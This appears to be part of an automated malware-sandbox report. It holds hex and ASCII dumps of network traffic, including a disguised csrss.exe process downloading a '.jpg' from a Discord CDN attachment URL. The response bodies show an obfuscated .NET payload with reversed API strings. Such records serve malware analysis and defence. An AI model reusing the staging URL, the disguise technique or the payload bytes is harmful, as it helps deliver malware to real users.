b1 f8 8a a0 46 45 43 4d 24 33 ad
                                                  Data Ascii: 'd<@YVn$uzEclQef9sZg)PBI,?=<kQE'.2n25mh,4iNw?S%#?0t.+fd in+V`Y76.pth27=!1l?#]1e,y\L.n\yHdATMk)(+gP(^:[{QFECM$3
                                                  2022-04-23 06:15:18 UTC1789INData Raw: e7 02 ae b9 11 8c b7 1d cb db fb 20 2a bb c5 79 6b 6a d2 96 ef ab cd 57 e5 07 7d 33 69 0f 83 7e bf 04 ba b9 70 ce 54 e7 ce ec 40 49 38 b3 5e 43 da de 0c 67 02 db 0d a5 e9 4b 29 7d 59 bd 49 26 cf 74 7a 68 f8 01 de 42 cc b0 ac 74 b1 c2 10 31 38 98 e1 32 36 12 bc aa d0 a4 ae 93 64 e9 1c 1a 51 fa 72 6b 49 eb b3 ee f8 7f 59 d6 f3 a0 af 3b ad 7e 6f b4 8d c0 ed 11 10 4b 70 e2 7a b4 90 d3 88 60 b9 4e 33 55 ab 70 de ce a0 b6 64 99 94 08 4d e6 50 38 5f 08 ca 38 da ad 8a 6e 52 d0 05 27 df e9 64 61 52 f4 b6 96 1a 99 92 d4 28 95 6f 18 23 d1 c2 8e 8f d1 12 ce b3 20 42 cc a6 06 7c 7b 22 0c 30 55 50 10 6f 09 5c fc f1 22 26 76 b6 a3 e2 50 ae b3 9c e7 22 4a 98 b6 89 af 28 a3 26 e1 99 a4 f6 02 3c c6 83 f1 d6 9d 1a 2b 40 ee e4 9f 33 5a fa 71 bc f7 95 30 90 74 c9 11 eb ec f8
                                                  Data Ascii: *ykjW}3i~pT@I8^CgK)}YI&tzhBt1826dQrkIY;~oKpz`N3UpdMP8_8nR'daR(o# B|{"0UPo\"&vP"J(&<+@3Zq0t
                                                  2022-04-23 06:15:18 UTC1805INData Raw: 89 e1 66 3b 7b 30 4e df e1 a5 a2 7e bf 82 3d 2f 11 a2 d5 2c 85 58 17 9a 55 ae 54 8b 42 b6 91 38 91 fb b7 67 72 8c f8 f3 0f e6 c8 f9 83 df d4 8a 19 a2 ec cd 2f 76 b0 93 5e be cb 44 7e d8 8e ad 34 5b 53 6e 99 42 b0 fb 55 7a 8d 75 19 b0 e3 f9 1f da 85 53 b5 45 91 cf 28 eb 21 63 34 24 6b e5 01 9d 0a 63 20 aa 72 82 8f 75 f2 20 ba 21 dc 71 75 a5 ec 7a 1c 91 a9 15 3d 41 c9 99 ce fe 0d fa 67 4b 93 5e 69 e4 8e 94 10 f4 f5 05 97 c5 55 82 1d b7 b5 ca 63 10 25 f3 0e c9 83 e7 24 df e3 d1 21 96 2c 88 c2 5e e1 58 30 cb 72 00 7c 5c f0 2b f0 c5 d1 f9 2c 51 e0 98 e5 9d f5 2d f4 a8 7c 86 2d 6a 53 ea 3e ba e4 dc ee 08 5b 16 76 a9 c7 6d d5 15 09 b0 d7 8d e3 c1 4c c8 ec 4d 3e 8f 4f 9f ae c0 94 e9 e1 a3 b0 e0 8d 07 70 9f 1c f5 b3 90 c7 c6 89 8b c9 dd 68 4b ea a7 21 84 39 c5 3b
                                                  Data Ascii: f;{0N~=/,XUTB8gr/v^D~4[SnBUzuSE(!c4$kc ru !quz=AgK^iUc%$!,^X0r|\+,Q-|-jS>[vmLM>OphK!9;
                                                  2022-04-23 06:15:18 UTC1821INData Raw: f3 8a c4 3f 66 f7 32 e0 9b f4 5e f7 2d 37 08 9e 57 43 08 c6 08 35 05 b3 6a 6b e9 4d 2f fd a2 f5 28 91 74 3d b6 89 2d 09 6a 99 3f ce 07 fe 6c 26 2c 3a 17 e9 69 b2 95 60 17 dc 8e b8 53 8c 7b 06 42 90 98 3c c5 d8 47 ef 2e 9f 0e ce 78 56 14 cc bd c7 2c 1b 84 72 d3 84 6e fe ef f5 26 33 e4 db f6 19 ab 8f d8 ad 13 93 3a ce d6 8d 61 30 e3 59 a3 b8 9b cc c6 a0 e1 c2 84 41 97 05 07 e9 4b fb 89 24 8e 89 eb 59 d1 31 ce 58 89 c9 04 d5 16 f5 21 8d d4 4f 20 5a a4 49 77 85 23 80 3d 10 4a 7d 5e 21 a1 41 39 f2 07 38 9e e4 f0 d8 74 ac 54 be 0a e2 3b 17 b1 c0 48 99 38 47 e5 5b d4 c8 e3 27 c7 ed 71 54 ee d0 ed f0 d1 63 60 f1 b9 80 b1 c9 21 18 f3 72 00 d4 f1 81 5a f7 5f 77 c3 e7 84 9a 9c f4 d6 ff 46 c8 8a e9 75 94 6a 01 33 85 12 db 66 7b 2a 37 aa 23 ac 51 5a f4 97 38 fd 13 13
                                                  Data Ascii: ?f2^-7WC5jkM/(t=-j?l&,:i`S{B<G.xV,rn&3:a0YAK$Y1X!O ZIw#=J}^!A98tT;H8G['qTc`!rZ_wFuj3f{*7#QZ8
                                                  2022-04-23 06:15:18 UTC1837INData Raw: d7 da ae ba 2b b7 63 3c 9b e1 ae d9 e4 08 6b 8f f9 ff 16 3c dd 75 ea df a6 ac 17 b4 ec d5 5e 9e bc 90 3e ea bc ee b3 cf d5 9d cd 93 63 9b f9 ae a9 60 15 e5 69 6b fc cf 59 61 5e 66 18 aa 87 60 6d a9 e6 16 45 a7 c4 cb 66 89 a5 cf 87 45 0d d4 f0 22 5a ad 22 14 64 36 98 29 68 3b 0e f7 4a 4b b6 29 b4 b1 b8 6e b0 fe 55 8b ac 07 60 46 4a 77 90 1f 44 1b 4b b2 3f 2c 77 fa 6e 26 e2 3d 5e 6a 82 2b 16 94 6d 9b 76 c7 f1 0a 4d 61 98 7d 30 29 e4 55 58 c1 a3 9d ae 4b 60 f8 21 31 6d 08 81 60 17 a3 5e 6e d5 31 69 18 c5 23 f7 79 bc 69 d4 08 fd 5c ff 2b 5c a7 26 38 6b 0f 44 af 3e 29 96 03 bd fd b7 9f 46 9c 00 06 f5 bd d9 f9 e9 26 63 30 5d 47 56 65 86 90 45 3e 70 8e 5d 5c ae 42 42 f8 fd 03 f3 98 dd c1 db 8e 2e ba f9 cc 12 a7 41 40 45 b2 5a d4 59 cf 00 4a bb ec 56 b5 8c 9b cc
                                                  Data Ascii: +c<k<u^>c`ikYa^f`mEfE"Z"d6)h;JK)nU`FJwDK?,wn&=^j+mvMa}0)UXK`!1m`^n1i#yi\+\&8kD>)F&c0]GVeE>p]\BB.A@EZYJV
                                                  2022-04-23 06:15:18 UTC1853INData Raw: 8a a4 57 ea 76 64 61 06 af 04 01 07 2f 5f c1 59 ce 30 b9 6e 6c c2 b3 b8 bc 0a a5 7e a6 e9 48 6b 5f 2d 61 14 e2 f6 5b 81 f6 48 97 9e d5 dc c5 d9 f1 ec 8f e7 cb 1f 8d f1 6d 3c 94 2d a7 54 77 0f 55 c7 88 d6 a3 68 ac 2d ac 08 f7 1b 20 ae 21 1b 34 99 ee 83 9a 14 ab de 0c c9 84 e9 d5 6b fb 37 8b 51 36 82 a8 6b d5 bc 20 f0 83 1d ad e1 1c a6 74 66 3d d8 07 a9 0e 06 8f 2e dc cd fa e8 bd fa 20 9b 6f d4 a4 8a ee 13 7e b8 e8 06 0b f6 34 43 53 a7 e6 d5 05 1b 61 06 b5 dc 55 33 38 9a 04 99 98 6e 76 e4 f1 0c e9 f1 29 a7 74 1b 75 60 0a 15 83 b0 b8 97 09 eb 17 22 77 ba 30 67 57 50 03 d2 92 63 03 84 1b 36 90 36 f4 c7 89 b8 49 15 ce 04 7c bd 2e 64 e4 4b 83 22 1d 2e c8 01 71 04 02 05 5e ad ff 23 2a 52 59 7c 48 de c9 ff 04 99 77 76 96 29 51 fa 8c 5f ea 26 6c 28 e3 5a 55 b5 0f
                                                  Data Ascii: Wvda/_Y0nl~Hk_-a[Hm<-TwUh- !4k7Q6k tf=. o~4CSaU38nv)tu`"w0gWPc66I|.dK".q^#*RY|Hwv)Q_&l(ZU
                                                  2022-04-23 06:15:18 UTC1869INData Raw: c0 fb 76 8e 34 6c c6 27 bd 9e 1b 8f 17 13 be 49 db da 6a 85 42 00 b7 54 c1 ed 54 86 71 39 85 7f f5 eb 55 af 21 58 ab 4e dc f2 53 a0 07 35 99 33 ac a9 17 ee 76 07 b9 10 88 e2 55 b0 21 61 f6 25 b7 a6 01 ff 77 11 86 1e d7 f5 53 a6 35 6b d7 25 86 fa 19 f5 70 10 ba 74 df 87 27 c3 c6 13 b3 57 c2 7d 8c 4d dd 63 c1 80 1f 87 27 4a b7 27 aa 01 9f b9 d4 8f 12 d3 77 8b 02 2c b0 6e fb b9 04 e4 65 63 d8 01 be cf 4e 94 11 36 b3 16 96 84 70 95 00 01 be 44 d0 52 f2 16 8a b6 17 fa 66 22 b2 48 c2 dc 62 98 12 55 f2 17 8e b6 16 c6 52 40 b2 50 c4 93 66 86 10 55 a0 59 84 b2 4d a1 29 77 d9 65 a4 bd 02 e5 70 54 bd 15 d5 e4 10 a2 60 75 d0 20 90 91 19 d4 40 1f bf 5a ca fa 5b 9f 28 67 ce 2a 9f bb 11 fa 6e 3f bb 59 ce fa 7b bb 2b a3 4c 8a 8e e8 33 e7 f3 19 26 94 21 68 15 a0 0c 2e 8e
                                                  Data Ascii: v4l'IjBTTq9U!XNS53vU!a%wS5k%pt'W}Mc'J'w,necN6pDRf"HbUR@PfUYM)wepT`u @Z[(g*n?Y{+L3&!h.
                                                  2022-04-23 06:15:18 UTC1885INData Raw: 00 00 00 28 01 00 00 2a dc 0a 00 00 07 6f 07 06 2c 07 0a de 00 de 26 03 de 26 0a 00 00 c2 6f 08 06 00 00 8f 6f 06 00 01 19 6f 06 00 01 66 28 07 0a 00 00 bb 6f 0a 00 00 c1 28 a2 06 00 00 bb 28 65 95 d1 36 20 1c 25 a2 0a 00 00 c0 6f 06 00 00 cb 28 1b 25 a2 06 00 00 bb 28 65 95 d1 12 20 1a 25 a2 0a 00 00 bf 28 04 12 04 13 0a 00 00 be 28 04 12 04 13 0a 00 00 bd 28 19 25 a2 06 00 00 bb 28 65 95 d0 f0 20 18 25 a2 0a 00 00 bc 28 17 25 a2 06 00 00 bb 28 65 95 d0 bb 20 16 25 01 00 00 85 8d 1d 06 00 00 bb 28 65 95 d0 a9 20 08 0a 00 00 bb 6f 06 00 00 bb 28 65 95 d0 9b 20 06 00 00 bb 28 65 95 d0 88 20 08 0c 0a 00 00 ba 73 00 00 00 c6 dd 05 2c 09 0d 17 01 2b 06 00 00 cd 28 07 2d 06 00 00 cc 28 00 00 2b 0b 03 2b 26 03 2d 1e 0a 00 00 b9 73 00 de 26 f7 2b 0a 00 00 b8 28
                                                  Data Ascii: (*o,&&ooof(o((e6 %o(%(e %(((%(e %(%(e %(e o(e (e s,+(-(++&-s&+(


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.649729162.159.133.233443C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-04-23 06:15:18 UTC1897OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2022-04-23 06:15:18 UTC1897INHTTP/1.1 200 OK
                                                  Date: Sat, 23 Apr 2022 06:15:18 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 387072
                                                  Connection: close
                                                  CF-Ray: 700476c5ce0b9a17-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 487
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "fce090eab4bfe6a3d63ebc34f3979aaf"
                                                  Expires: Sun, 23 Apr 2023 06:15:18 GMT
                                                  Last-Modified: Fri, 11 Feb 2022 19:48:42 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1644608922184980
                                                  x-goog-hash: crc32c=wezq3g==
                                                  x-goog-hash: md5=/OCQ6rS/5qPWPrw085earw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 387072
                                                  X-GUploader-UploadID: ADPycdtKqfssV5gXSEkEU-GSIerpxp8CHIbDYFk25SOnHq78HplyaMuQo1jVekgXmuj72goZFfCtCGw0Rr6hHXhhv5O64hS4RUso
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jhAgV0%2Fx%2BqzDno0ifqreKkFCNeNGIRc32B2kuQ5Wf4Rog5rjg%2FMcXzyU2sFIBt7gh4BowJfiCAx2s4g181WH0oy4Wzun%2BeDE8OPdxGsoCmVwQBKFJxdfT2s0S%2FdyRBSNF%2BrYaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  2022-04-23 06:15:18 UTC1898INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                  Data Ascii: Server: cloudflare
                                                  2022-04-23 06:15:18 UTC1898INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:15:18 UTC1900INData Raw: 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 02 e4 00 00 00 00 00 00 00 00 00 00 02 e4 00 06 00 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: ?OFNI_NOISREV_SV4XH0
                                                  2022-04-23 06:15:18 UTC1901INData Raw: 05 1d 01 04 00 08 18 02 18 03 07 05 ed 81 11 35 12 01 02 00 08 05 1d 02 05 1d 02 18 08 06 07 0a 18 05 1d 02 07 05 0e 0e 02 07 04 a9 80 12 00 20 05 18 00 20 03 a1 80 12 00 00 05 02 02 02 02 e9 80 12 a5 80 12 75 12 02 08 07 0f 7d 12 0e 05 1d 02 20 07 0e 1d 0e 01 00 05 89 80 11 00 20 05 89 80 11 00 00 05 69 81 11 01 01 00 06 89 80 11 02 7d 12 71 81 12 02 05 07 0c 9c 80 12 01 07 05 08 08 0e 02 20 05 03 08 01 20 04 0e 0e 08 0e 08 0e 94 80 12 07 07 0b 1c 0e 0e 02 00 05 0d 00 20 03 49 82 11 00 20 05 bd 80 12 00 00 05 49 82 11 08 08 bd 80 12 04 07 0a 21 81 11 08 25 81 11 11 81 11 1d 81 11 0e 01 06 20 11 08 08 05 1d 0e 03 20 07 0e 01 01 00 04 02 0e 02 03 07 05 05 1d 0e 01 02 00 06 d5 80 11 0e 01 00 06 0e 01 81 12 01 00 06 98 80 11 0e 0e 0e 04 07 08 05 1d 08 39 81
                                                  Data Ascii: 5 u} i}q I I!% 9
                                                  2022-04-23 06:15:18 UTC1902INData Raw: 30 2e 30 2e 36 31 08 72 65 64 6c 69 75 42 65 63 72 75 6f 73 65 52 64 65 70 79 54 79 6c 67 6e 6f 72 74 53 2e 73 6c 6f 6f 54 2e 73 65 63 72 75 6f 73 65 52 2e 6d 65 74 73 79 53 33 00 01 41 00 00 00 00 00 15 00 01 08 00 00 00 00 00 14 00 01 08 00 00 00 00 00 13 00 01 08 0e 1d 00 28 04 00 00 00 00 00 12 00 01 08 00 00 00 00 00 11 00 01 08 24 11 00 28 04 00 00 00 00 00 10 00 01 08 00 00 00 00 00 0f 00 01 08 00 00 00 00 00 0e 00 01 08 b8 80 12 00 28 05 00 00 00 00 00 0d 00 01 08 00 00 00 00 00 0c 00 01 08 00 00 00 00 00 0b 00 01 08 00 00 00 00 00 0a 00 01 08 00 00 00 00 00 09 00 01 08 00 00 00 00 00 08 00 01 08 00 00 00 00 00 07 00 01 08 0c 81 12 00 28 05 00 00 00 00 00 06 00 01 08 60 12 00 28 04 08 00 28 03 ac 80 11 00 28 05 4c 11 00 28 04 d5 81 11 01 01 20 06
                                                  Data Ascii: 0.0.61redliuBecruoseRdepyTylgnortS.slooT.secruoseR.metsyS3A($(((`(((L(
                                                  2022-04-23 06:15:18 UTC1904INData Raw: 20 0a e5 80 12 18 01 20 06 1c 39 12 18 e5 80 12 03 20 09 18 18 01 20 04 02 10 18 02 02 00 06 02 0e 0e 02 03 00 06 09 10 09 19 18 02 04 00 08 0e 10 18 18 02 00 06 22 01 0e 10 18 01 00 05 09 10 09 18 18 02 04 00 08 08 2d 82 12 18 18 09 04 00 09 18 02 01 00 04 02 01 18 02 78 11 18 03 00 07 08 01 08 2a 02 09 10 09 18 1d 02 03 00 08 2d 82 12 18 09 18 18 04 00 09 08 2d 82 12 18 08 03 00 08 c5 80 11 10 08 0a 02 00 08 08 70 12 08 02 03 00 07 08 10 08 08 02 00 06 08 2d 82 12 08 01 03 00 08 08 08 08 18 18 04 00 07 08 08 2d 82 12 08 08 08 05 00 0a 08 00 00 03 6c 11 08 01 00 05 68 12 06 03 05 1d 01 01 20 05 05 1d 00 20 04 0e 00 20 03 02 01 01 20 04 05 1d 06 03 e5 80 12 02 01 20 06 1c 39 12 08 e5 80 12 03 20 09 08 02 01 20 04 18 1c 01 02 20 05 08 08 02 02 20 05 5c 12
                                                  Data Ascii: 9 "-x*--p--lh 9 \
                                                  2022-04-23 06:15:18 UTC1905INData Raw: 69 6e 55 6f 54 00 77 6f 4e 5f 74 65 67 00 65 6d 61 4e 72 65 73 55 5f 74 65 67 00 6c 6f 63 6f 74 6f 72 50 79 74 69 72 75 63 65 53 5f 74 65 73 00 66 4f 78 65 64 6e 49 00 6e 69 4d 00 74 61 6d 72 6f 46 00 73 64 6e 6f 63 65 53 6c 61 74 6f 54 5f 74 65 67 00 64 65 73 70 61 6c 45 5f 74 65 67 00 77 65 4e 74 72 61 74 53 00 65 6d 61 4e 79 72 6f 74 63 65 72 69 44 74 65 47 00 65 74 65 6c 65 44 00 73 65 74 79 42 6c 6c 41 65 74 69 72 57 00 68 74 61 50 72 65 64 6c 6f 46 74 65 47 00 79 72 6f 74 63 65 72 69 44 65 74 61 65 72 43 00 68 74 61 50 70 6d 65 54 74 65 47 00 64 6e 65 70 70 41 00 67 6e 69 72 74 73 62 75 53 00 68 74 69 57 73 74 72 61 74 53 00 6d 69 72 54 00 6d 6f 72 46 64 61 6f 4c 00 67 6e 69 72 74 53 34 36 65 73 61 42 6f 54 00 74 6e 61 69 72 61 76 6e 49 72 65 70 70
                                                  Data Ascii: inUoTwoN_tegemaNresU_teglocotorPytiruceS_tesfOxednIniMtamroFsdnoceSlatoT_tegdespalE_tegweNtratSemaNyrotceriDteGeteleDsetyBllAetirWhtaPredloFteGyrotceriDetaerChtaPpmeTteGdneppAgnirtsbuShtiWstratSmirTmorFdaoLgnirtS46esaBoTtnairavnIrepp
                                                  2022-04-23 06:15:18 UTC1906INData Raw: 42 65 6c 75 64 6f 4d 74 65 47 00 73 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 6d 75 6e 45 00 78 45 65 6d 61 4e 65 6c 69 46 65 6c 75 64 6f 4d 74 65 47 00 65 6c 64 6e 61 48 65 73 6f 6c 43 00 73 73 65 63 6f 72 50 6e 65 70 4f 00 73 65 73 73 65 63 6f 72 50 6d 75 6e 45 00 65 67 61 73 73 65 4d 64 6e 65 53 00 74 78 65 54 77 6f 64 6e 69 57 74 65 47 00 74 63 65 52 77 6f 64 6e 69 57 74 65 47 00 73 77 6f 64 6e 69 57 64 6c 69 68 43 6d 75 6e 45 00 64 49 73 73 65 63 6f 72 50 64 61 65 72 68 54 77 6f 64 6e 69 57 74 65 47 00 65 6d 61 4e 73 73 61 6c 43 74 65 47 00 63 6f 6c 6c 41 6c 61 75 74 72 69 56 00 6f 66 6e 49 6f 65 47 74 65 47 00 44 49 43 4c 74 6c 75 61 66 65 44 72 65 73 55 74 65 47 00 44 49 6f 65 47 72 65 73 55 74 65 47 00 61 00 6c 6f 64 71 67 6b 4d 00 02 80 80 e2 88 80
                                                  Data Ascii: BeludoMteGseludoMssecorPmunExEemaNeliFeludoMteGeldnaHesolCssecorPnepOsessecorPmunEegasseMdneStxeTwodniWteGtceRwodniWteGswodniWdlihCmunEdIssecorPdaerhTwodniWteGemaNssalCteGcollAlautriVofnIoeGteGDICLtluafeDresUteGDIoeGresUteGalodqgkM
                                                  2022-04-23 06:15:18 UTC1908INData Raw: 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 6b 72 6f 77 65 6d 61 72 46 74 65 67 72 61 54 00 65 74 75 62 69 72 74 74 41 72 65 74 6e 69 6f 50 6e 6f 69 74 63 6e 75 46 64 65 67 61 6e 61 6d 6e 55 00 74 6e 65 6d 6e 6f 72 69 76 6e 45 65 6d 69 74 6e 75 52 00 6c 61 68 73 72 61 4d 00 65 74 75 62 69 72 74 74 41 65 6c 62 69 73 69 56 6d 6f 43 00 73 65 63 69 76 72 65 53 70 6f 72 65 74 6e 49 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 6e 6f 69 74 6e 65 76 6e 6f 43 67 6e 69 6c 6c 61 43 00 73 72 65 70 6c 65 48 65 6d 69 74 6e 75 52 00 65 74 75 62 69 72 74 74 41 79 74 69 6c 69 62 69 74 61 70 6d 6f 43 65 6d 69 74 6e 75 52 00 65 6c 69 74 61 6c 6f 56 73 49 00 73 65 63 69 76 72 65 53 72 65 6c 69 70 6d 6f 43 2e 65 6d 69 74 6e 75 52 2e 6d 65 74
                                                  Data Ascii: .emitnuR.metsySetubirttAkrowemarFtegraTetubirttAretnioPnoitcnuFdeganamnUtnemnorivnEemitnuRlahsraMetubirttAelbisiVmoCsecivreSporetnI.emitnuR.metsySnoitnevnoCgnillaCsrepleHemitnuRetubirttAytilibitapmoCemitnuRelitaloVsIsecivreSrelipmoC.emitnuR.met
                                                  2022-04-23 06:15:18 UTC1909INData Raw: 74 72 61 74 53 73 73 65 63 6f 72 50 00 6e 6f 69 74 63 65 6c 6c 6f 43 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 73 73 65 63 6f 72 50 00 65 74 75 62 69 72 74 74 41 65 64 6f 43 72 65 73 55 6e 6f 4e 72 65 67 67 75 62 65 44 00 65 74 75 62 69 72 74 74 41 6e 65 64 64 69 48 72 65 67 67 75 62 65 44 00 65 74 61 74 53 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 73 63 69 74 73 6f 6e 67 61 69 44 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 65 74 61 67 65 6c 65 44 00 65 6d 69 54 65 74 61 44 00 74 72 65 76 6e 6f 43 00 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 2e 6d 65 74 73 79 53 00 6e 6f 69 74 70 65 63 78 45 32 33 6e 69 57 00 64 65 7a 69 6c 61 69 63 65 70 53
                                                  Data Ascii: tratSssecorPnoitcelloCeludoMssecorPeludoMssecorPssecorPetubirttAedoCresUnoNreggubeDetubirttAneddiHreggubeDetatSelbasworBreggubeDscitsongaiD.metsySetubirttAelbasworBreggubeDetageleDemiTetaDtrevnoCledoMtnenopmoC.metsySnoitpecxE23niWdezilaicepS
                                                  2022-04-23 06:15:18 UTC1910INData Raw: 33 00 2f 00 32 00 2f 00 31 00 2f 00 30 00 24 00 27 00 24 00 26 00 24 00 25 00 20 00 24 00 20 00 23 00 20 00 22 00 20 00 21 00 19 00 1f 00 19 00 1e 00 19 00 1d 00 19 00 1c 00 19 00 1b 00 19 00 1a 00 16 00 17 00 15 00 16 00 0e 00 0f 00 04 00 07 00 04 00 06 00 04 00 05 00 02 00 03 00 00 00 eb 00 00 00 02 00 05 08 04 00 00 00 ca 00 00 00 02 00 00 00 00 00 00 00 00 00 67 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 5b 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 49 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 3c 00 13 00 00 00 00 00 00 00 00 00 04 00 02 00 00 00 00 00 35 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 26 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 1d 00 01 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: 3/2/1/0$'$&$% $ # " !g[I<5&
                                                  2022-04-23 06:15:18 UTC1912INData Raw: 08 98 08 7f 08 40 08 39 08 2b 08 27 08 22 08 1e 00 1f 00 00 00 00 00 01 00 1d 00 00 00 00 00 01 00 07 00 00 00 63 00 01 00 06 00 00 00 0d 00 01 00 05 00 00 00 0c 00 01 02 10 00 c5 02 10 00 c1 01 e6 00 bf 01 e6 00 b7 01 e6 00 af 01 f0 00 a5 01 f0 00 a1 01 e6 00 9d 01 e3 00 99 05 fe 00 64 05 ee 00 1b 14 41 05 ee 00 1b 14 21 05 ee 00 1b 12 81 05 ee 00 1b 12 61 05 ee 00 1b 12 41 05 ee 00 1b 12 21 05 ee 00 1b 12 01 05 ee 00 1b 11 e1 05 ee 00 1b 11 c1 05 ee 00 1b 11 a1 05 ee 00 1b 11 81 05 ee 00 1b 11 61 05 ee 00 1b 11 41 05 ee 00 1b 11 21 05 ee 00 1b 11 01 05 ee 00 1b 10 e1 05 ee 00 1b 10 c1 05 ee 00 1b 10 a1 05 ee 00 1b 10 81 05 ee 00 1b 10 61 05 ee 00 1b 10 41 05 ee 00 1b 10 21 05 ee 00 1b 10 01 00 5c 00 23 0f c0 00 5c 00 23 0f a0 05 ee 00 1b 0f 81 00 5c 00
                                                  Data Ascii: @9+'"cdA!aA!aA!aA!\#\#\
                                                  2022-04-23 06:15:18 UTC1913INData Raw: 30 15 4b 00 54 08 cf 11 98 00 54 04 5a 15 44 04 29 0d ad 12 50 02 81 08 45 15 38 04 41 0d a7 0d 88 04 29 01 76 12 50 04 59 0d a0 13 bc 04 59 09 3c 15 25 03 01 08 87 10 8c 00 54 00 28 0d 88 00 54 00 70 0c 20 00 09 0c f4 15 20 03 b9 00 23 0d 88 01 01 01 8f 15 0e 03 b9 0a 5c 11 8c 02 91 0c e5 14 fe 03 a1 02 e1 14 ec 02 69 00 28 0d 88 02 f9 0c c5 14 dc 01 49 09 42 14 d3 04 29 01 76 14 cb 04 29 01 76 14 bc 01 49 02 c8 0e 0d 00 f1 0c c9 14 b0 01 41 0c c5 14 a5 01 41 0c bf 14 93 01 41 0c a7 14 86 02 e1 0c a1 11 6b 04 29 01 76 10 83 02 59 01 76 12 50 01 11 0c 9b 14 76 01 11 0c 95 14 6e 01 11 02 e1 14 61 01 a1 07 a5 10 b0 00 f9 00 28 0d 88 00 f9 00 28 0d 88 02 e1 0c 8e 14 4c 02 d9 0c 75 13 b2 04 29 0c 70 14 44 04 29 04 a2 14 40 02 c1 00 a8 0d 88 04 99 0c 5e 14 39
                                                  Data Ascii: 0KTTZD)PE8A)vPYY<%T(Tp #\i(IB)v)vIAAAk)vYvPvna((Lu)pD)@^9
